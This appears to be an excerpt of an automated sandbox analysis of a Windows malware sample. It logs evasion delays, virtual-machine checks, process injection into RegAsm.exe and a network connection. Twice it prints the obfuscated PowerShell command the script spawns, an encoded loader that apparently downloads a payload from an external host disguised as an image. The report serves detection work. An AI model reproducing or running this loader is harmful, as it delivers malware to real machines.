Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4C00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1654	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1669	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4435	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5313	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 992	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6492	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep count: 4435 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3928	Thread sleep count: 5313 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 3015 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep count: 992 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2820	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3664	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4568	Thread sleep count: 3317 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4568	Thread sleep count: 6492 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp&
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235638255.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000007.00000002.3512863153.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 172.67.187.200 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_6412.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD3008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
